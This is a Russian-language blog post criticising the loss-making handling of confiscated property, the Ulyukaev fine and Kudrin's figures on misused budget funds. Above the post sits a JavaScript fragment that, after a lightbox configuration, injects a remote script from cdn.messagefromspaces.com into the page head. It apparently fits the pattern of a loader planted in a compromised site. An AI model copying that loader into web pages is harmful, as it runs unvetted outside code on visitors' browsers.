, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Счётная палата объяснила причину неприменения Путиным п.п. 8 п. 2 статьи 235 ГК РФ

04 Дек

В Счётной палате сообщили https://russian.rt.com/business/news/579128-rosimuschestvo-konfiskaciya-auditory?utm_source=yxnews&utm_medium=desktop   об убыточности конфискации имущества.

Этим дан ответ на то, почему у бывшего члена правительства Улюкаева,  ни дня, не работавшего в бизнесе, не конфисковали «сомнительного имущества» на миллиард рублей.

Суд оштрафовал его  только в размере 130 млн. руб., что соответствует однократной сумме полученной взятки, а мог бы и в размере двадцатикратной.

Не потрудилась  со сбором материалов для применения  п.п. 8 п. 2 статьи 235 ГК РФ к министру экономического развития и  Администрация Путина.

А зачем, если сам гарант Конституции тем, как применяется эта норма на практике, уже шесть лет не интересуется.

Оппоненты, осуществляющие государственную власть, сосредоточились на коррупционной деятельности чиновников, и почти не уделяют внимание тому, насколько  не эффективна  деятельность тех, кто взялся осуществлять государственную власть.

Выводы Счётной палаты об этом убедительно рассказывают:

«В 2017 году расходы на хранение составили 222 млн рублей, а доходы от реализации — 180 млн рублей».

«В первой половине текущего года Росимущество потратило на хранение конфиската 62 млн рублей при прибыли всего в 64 млн рублей.

На продажу направляется менее 1% изъятого имущества».

Если осуществляющие исполнительную власть неспособны справиться с имуществом, которое хранится у них на складах то, как можно им доверять такое народное достояние, как бюджет страны?

Оказывается, доверяют и вот, что из этого получается.

Глава Счётной палаты Кудрин рассказал, как безнаказанно годами  тратят триллионы бюджетных средств  не по назначению или разворовывают.

Общая сумма выявленных нарушений  и нецелевого использования средств в 2017 году  составила 1,865 трлн рублей. Согласно уточнению https://www.gazeta.ru/science/2018/11/26_a_12072211.shtml?utm_source=yxnews&utm_medium=desktop   Кудрина, это почти вдвое больше, чем в 2016 году, и в 3,5 раза больше по сравнению с 2015-м.

Время покажет, во сколько раз возрастёт неправомерное использование бюджетных средств  по итогам 2018 года?

Но итог по организации экономического развития в стране и сохранности произведённых народом благ, печален.

Единственный источник власти в стране, многонациональный народ, своими налоговыми выплатами ежегодно пополняет более 70% бюджетных средств. Как эти средства будут расходоваться, определяют депутаты, узаконивая траты. А исполнять бюджет берётся исполнительная власть, которая никакой ответственности не несёт за то, что тратят триллионы бюджетных средств  не по назначению или разворовывают.

Да, есть правоохранительные службы, сотни тысяч сотрудников и миллионы штатных и нештатных помощников, которые обязаны выявлять хищения народной собственности. Но зачем нам они? Зачем народу  затраты на их содержание, если то, что они обнаружат и изымут у расхитителей, становится убыточным?

Все достижения Путина меркнут от такой экономики в стране и работы правоохранительных органов.

Мне стыдно за такое осуществление государственной власти в моей стране.

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.